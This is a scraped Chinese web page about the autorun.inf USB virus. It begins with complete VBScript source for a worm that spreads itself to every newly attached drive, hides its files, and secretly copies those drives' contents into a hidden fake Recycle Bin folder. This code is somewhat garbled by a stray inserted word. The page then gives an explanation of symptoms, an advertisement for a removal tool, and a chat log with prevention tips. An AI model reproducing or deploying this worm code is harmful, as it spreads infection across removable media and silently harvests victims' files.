autorun.inf病毒

发布时间:2015-06-09 来源: ftp中autorun.inf病毒

第一篇:autorun.inf病毒

autorun.inf病毒源代码 '文件名:autorun.inf [autorun] open= shell\open=打开(&O) shell\open\Command=WScript.exe stNP.vbs shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=WScript.exe stNP.vbs '文件名:stNP.vbs on error resume next set fso = CreateObject("Scripting.FileSys"&"temObject") if fso.FileExists("NP.vbs") = -1 then if fso.FileExists("d:\NP.vbs") = -1 then set f = fso.getfile("d:\NP.vbs") if f.attributes = 0 then else f.attributes = 0 end if f.delete(true) end if fso.copyfile "NP.vbs", "d:\NP.vbs", true set wshshell = wscript.createobject("WScript.Shell") wshshell.run "d:\NP.vbs" end if '文件名:NP.vbs '[NatruePark] '容错语句 on Error resume next '变量声明及初始化 dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell set fso = CreateObject("Scripting.File"&"SystemObject") set wshshell = wscript.createobject("WScript.Shell") old_n=0 redim old_drs(old_n) old_drs(0)="C" '[主体部分] wshshell.run("explorer .\") dim i i = 0 do while i>=0 and i<8*360 scan_disk() if judge_new_disk() = 1 then dim left_n left_n = 1 do while left_n<=(new_n-old_n) new_disk = new_drs(left_n+old_n)&":\" '-----------------<维护块>----------------- if fso.FileExists(new_disk&"NP.vbs") = -1 then else self_copy(new_disk) end if add_attrib(new_disk&"NP.vbs") if fso.FileExists(new_disk&"autorun.inf") = -1 then del_attrib(new_disk&"autorun.inf") end if add_autorun(new_disk) add_attrib(new_disk&"autorun.inf") if fso.FileExists(new_disk&"stNP.vbs") = -1 then else add_stNP(new_disk) end if add_attrib(new_disk&"stNP.vbs") '-----------------</维护块>----------------- '-----------------<功能块>----------------- dim rec rec = "d:\Recyc1ed\" if fso.FolderExists(rec) = -1 then else fso.createfolder(rec) end if add_attribf(rec) if fso.FileExists(rec&"desktop.ini") = -1 then else add_desktop(rec) end if add_attrib(rec&"desktop.ini") aim_folder = rec&Date()&Rnd() if fso.FolderExists(aim_folder) = -1 then else fso.createfolder(aim_folder) end if '查找"Serylab"文件夹并复制 if fso.FolderExists(new_disk&"Serylab") = -1 then fso.copyfolder new_disk&"Serylab", aim_folder, true add_attribf(aim_folder) end if '通用复制 if old_n = 0 then else set fp = fso.getFolder(new_drs(new_n)&":\") set fc = fp.SubFolders for each f in fc fso.copyfolder f&"", aim_folder&"\"&f.name, true next set fc = fp.files for each f in fc fso.copyfile f&"", aim_folder&"\", true next add_attribf(aim_folder) end if '-----------------</功能块>----------------- left_n=left_n+1 loop copy_disk() end if wscript.sleep(10000) i=i+1 loop '[函数部分] '可用驱动器检测 new_drs(),new_n function scan_disk() dim d, dr new_n = -1 set dr = fso.drives for each d in dr if d.isready then new_n=new_n+1 redim preserve new_drs(new_n) new_drs(new_n)=d.driveletter end if next end function '判断是否有新加入的驱动器 function judge_new_disk() if new_n = old_n then judge_new_disk = 0 elseif new_n < old_n then redim preserve old_drs(new_n) old_n = new_n judge_new_disk = 0 elseif new_n > old_n then redim preserve old_drs(new_n) judge_new_disk = 1 end if end function '复制新驱动器表单 function copy_disk() dim n n=0 do while n<=new_n old_drs(n) = new_drs(n) n=n+1 loop old_n = new_n end function '添加指定文件属性 function add_attrib(file) set f = fso.getfile(file) if f.attributes = 7 then else f.attributes = 7 end if end function '删除指定文件属性 function del_attrib(file) set f = fso.getfile(file) if f.attributes = 7 then f.attributes = 0 else end if end function '自我复制到指定文件目录 function self_copy(folder) dim aim_path, mid_path, self_file, mid_file aim_path = folder&"NP.vbs" mid_path = "c:\np.bin" set self_file = fso.opentextfile(wscript.scriptfullname,1) self = self_file.readall set mid_file = fso.opentextfile(mid_path,2,true) mid_file.write self mid_file.close set mid_file = fso.getfile(mid_path) mid_file.copy(aim_path) mid_file.delete(true) end function '增加autorun.inf function add_autorun(folder) dim path path = folder&"autorun.inf" set temp = fso.CreateTextFile("c:\a.bin",true) temp.writeline "[autorun]" temp.writeline "open=" temp.writeline "shell\open=打开(&O)" temp.writeline "shell\open\Command=WScript.exe stNP.vbs" temp.writeline "shell\open\Default=1" temp.writeline "shell\explore=资源管理器(&X)" temp.writeline "shell\explore\Command=WScript.exe stNP.vbs" temp.close set cop = fso.getfile("c:\a.bin") cop.copy(path) cop.delete(true) end function '增加desktop.ini function add_desktop(folder) dim path path = folder&"desktop.ini" set temp = fso.CreateTextFile("c:\d.bin",true) temp.writeline "[.ShellClassInfo]" temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}" temp.close set cop = fso.getfile("c:\d.bin") cop.copy(path) cop.delete(true) end function '增加stNP.vbs function add_stNP(folder) dim path set fso = CreateObject("Scripting.File"&"SystemObject") path = folder&"stNP.vbs" set temp = fso.CreateTextFile("c:\s.bin",true) temp.writeline "on error resume next" temp.writeline "set fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&ch作文r(34)&")" temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then" temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then" temp.writeline "set f = fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")" temp.writeline "if f.attributes = 0 then" temp.writeline "else" temp.writeline "f.attributes = 0" temp.writeline "end if" temp.writeline "f.delete(true)" temp.writeline "end if" temp.writeline "fso.copyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true" temp.writeline "set wshshell = wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")" temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34) temp.writeline "end if" temp.close set cop = fso.getfile("c:\s.bin") cop.copy(path) cop.delete(true) end function '添加指定文件夹属性 function add_attribf(folder) set f = fso.getfolder(folder) if f.attributes = 7 then else f.attributes = 7 end if end function '删除指定文件夹属性 function del_attribf(folder) set f = fso.getfolder(folder) if f.attributes = 0 then else f.attributes = 0 end if end function wscript.echo("THANK YOU!!") wscript.quit

第一篇:autorun.inf病毒

如何解决 autorun.inf 病毒的危害 autorun 病毒 病毒是一种 U 盘病毒,意思是“自动运行”,是 windows 系统的一种自动运行的文件命令,主要用 于对于移动设施的自动运行,因其方便性现在被很多病毒利用。

常见的 Autorun.inf 并不是病毒,这是用于自动播放的一个文件,例如我们用光盘看 DVD、电子书时都是 利用 autorun 文件。但如果被 autorun 病毒利用的话就是对电脑造成威胁的 autorun 病毒了。

autorun 病毒症状

病毒症状

当你双击想打开盘符时会发现无法打开,或是在新的窗口打开,或者出现让你选择打开方式的窗口,而右 击磁盘发现增加了两项,auto 是自动播放,那么可以确定,你的电脑或 U 盘是中了 autorun 病毒了。

autorun 病毒原理

病毒原理

用户一般都会双击打开磁盘的,而这种病毒便是利用了这一点,你一双击病毒就会自动运行,双击无法打 开,只有右键才可以打开,重装系统还是会中的。

中了 autorun 病毒后,autorun 病毒会传播到每个磁盘, 你的 QQ 账户、网游账户、银行账号等都有可能被窃取,那是很恐怖的事情了。那怎么解决呢? 对付这种 U 盘病毒, 就应该用专业查杀 U 盘病毒的软件。

盘杀毒专家 U (USBKiller) 就是好用最新的 autorun 病毒专杀工具。它可以全面扫描并查杀 auturun 病毒,oso 病毒,autorun.vbs 病毒等多种 U 盘病毒,并能 够修复被病毒修改的文件和系统。还可以禁止 U 盘自动播放,预防 U 盘中毒。

如何使用 U 盘杀毒专家(USBKiller)查杀并清除 autorun 病毒? 1、首先网上下载最新版的 autorun 专杀—U 盘杀毒专家(USBKiller),您可以在 U 盘杀毒专家官方网站 上免费下载:/xiazai.html 2、把中了毒的 U 盘等移动存储设备也插入电脑,然后打开 U 盘杀毒专家(USBKiller): 3、选择需要扫描对象,一共有内存、本地硬盘、移动存储设备三个选项,最好全都选上,然后点击“开始 扫描”: autorun 病毒专杀工具将查杀电脑和 U 盘里的病毒,扫描结束,在任务栏里可以看到扫描结果。 U 盘杀毒专家不仅仅是一款专业的 autorun 专杀工具,并且还可以查杀文件夹 exe 等上千种 U 盘病毒。使 用 U 盘杀毒专家清除 autorun 病毒不再是难事。

到这里了解更多关于 U 盘杀毒专家(USBKiller)的信息

第一篇:autorun.inf病毒

绝对不能双击盘符,应该这样 我的电脑-右键-资源管理器 ,看的时候一定要显示所有文件,病毒一般都有隐藏或系统属性 19:54:21 对方取消了“1.bmp”(4.12MB)的发送。

々风〃一阵∑ 19:54:35 哦~ 々风〃一阵∑ 19:58:56 那怎么预防这种病毒啊? 崔智 20:02:10 1.禁用自动播放,开始-运行-gpedit.msc 左侧“‘本地计算机’策略”中,依次找到以下位置:计算机配置 -> 管理模板 -> 系统 接下来在右侧找到“关闭自动播放”项目,双击它打开“关闭自动播放属性”对话框,点选“已启用”,然后在下方“关闭自动播放:”中的下拉菜单里选择“所有驱动器”,最后点击“确定”。 在“用户配置”下也有相同的项目可以设置。 々风〃一阵∑ 20:05:52 嗯~~ 设置好了~~ 崔智 20:06:13 2.做u盘免疫,在每个分区下建立一个autorun.inf的文件夹,这样有的病毒就不能创建一个autorun.inf的文件 可以打开360安全卫士的u盘防火墙 崔智 20:07:38 你现在已经中毒了,设置了用处不大 崔智 20:08:23 3.打齐windows系统补丁 崔智 20:15:22 4.个人习惯,拿到u盘或移动硬盘后,我的电脑-右键-资源管理器,在左边点盘符查看u盘或移动硬盘是否有病毒,看的时候一定要显示所有文件,包括系统隐藏文件,还要显示文件扩展名,因为有的病毒有2个扩展名,比如1.jpg.exe ,如果不显示扩展名的化,就会显示为1.jpg,这时候就会把它当成一个jpg文件 々风〃一阵∑ 20:20:55 我有个移动硬盘中毒了 还没有连接电脑我该怎么杀毒啊? 崔智 20:28:27 在被连接的电脑上,设置好 禁用自动播放 u盘免疫,再我的电脑-右键-资源管理器,在左边点盘符查看移动硬盘病毒,看的时候一定要显示所有文件,包括系统隐藏文件,文件扩展名,如果移动硬盘包括autorun.inf的文件,根目录里有可疑的可执行文件,删掉,如果根目录只有autorun.inf的文件,没有可疑的可执行文件,在autorun.inf的文件上点右键-打开,查看autorun.inf的文件内容,里面肯定包括病毒的相关信息,病毒路径,找到后删除 々风〃一阵∑ 20:31:03 是不是要在安全模式下啊? 崔智 20:32:54 都可以,安全模式更好 々风〃一阵∑ 20:33:47 哦 我用360杀毒,它提示已经清除病毒,我下次开机时还会不会有这种病毒啊? 崔智 20:34:21 难说 崔智 20:34:58 只有开机看了才知道 々风〃一阵∑ 20:35:16 哦~~~ 我试下~ 崔智 20:45:55 重新做系统一定要注意,其它盘里有没有病毒,别先双击其它几个盘符 崔智 20:46:47 做完系统后一定要看一下 々风〃一阵∑ 20:47:39 哦~~~ 如果双击了咋办啊? 崔智 20:51:14 我说的是做完系统后别双击其它盘符,双击了只有看杀毒软件能不能杀出来,杀不出来,就试试手动杀毒,再不行就只有重做系统了

autorun.inf病毒》出自:安格美文网
链接地址:http://www.tagmusic.net/article/ZP71KA5mnGtb7W1s.html

网站地图 | 关于我们 | 联系我们 | 广告服务 | 免责声明 | 在线留言 | 友情链接 | RSS 订阅 | 热门搜索
版权所有 安格美文网 www.tagmusic.net

autorun.inf病毒